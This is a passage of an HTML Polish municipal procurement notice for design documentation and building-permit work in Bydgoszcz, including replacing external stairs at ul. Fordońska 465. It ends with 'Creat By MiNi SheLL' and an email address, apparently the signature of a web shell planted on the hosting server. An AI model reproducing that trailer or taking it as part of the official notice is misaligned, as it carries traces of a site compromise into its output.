4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji              Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej            pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Zamawiający  określa  wymagany termin realizacji zamówienia:
1)  termin wykonania badań geotechnicznych gruntu i dokumentacji projektowo-kosztorysowej:  60 dni              od daty zawarcia umowy
2) termin dostarczenia Zamawiającemu decyzji na wykonanie robót budowlanych i kompletu dokumentacji: 70 dni  od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo- kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 130.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 112/P/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5:  obejmuje wykonanie dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją - na wymianę schodów zewnętrznych do lokalu gminnego nr 5 w budynku przy ul. Fordońskiej 465 w             Bydgoszczy na schody o konstrukcji lekkiej stalowej z zadaszeniem wraz z uzyskaniem przez Wykonawcę  decyzji  pozwolenia na wykonanie robót budowlanych objętych dokumentacją projektową.
Szczegółowy zakres  zamówienia obejmuje:
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii  i innych dokumentów - niezbędnych Wykonawcy do opracowania dokumentacji projektowej i uzyskania  decyzji pozwolenia na wykonanie robót budowlanych.
2) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej), zawierającego :
a) warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.
c) szczegółowy przedmiar robót :  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d) szczegółowa specyfikacja techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji            Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej            pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Zamawiający  określa  wymagany termin realizacji zamówienia:
1)  termin wykonania dokumentacji projektowo-kosztorysowej:   30 dni  od daty zawarcia umowy
2) termin dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji: 70 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo- kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com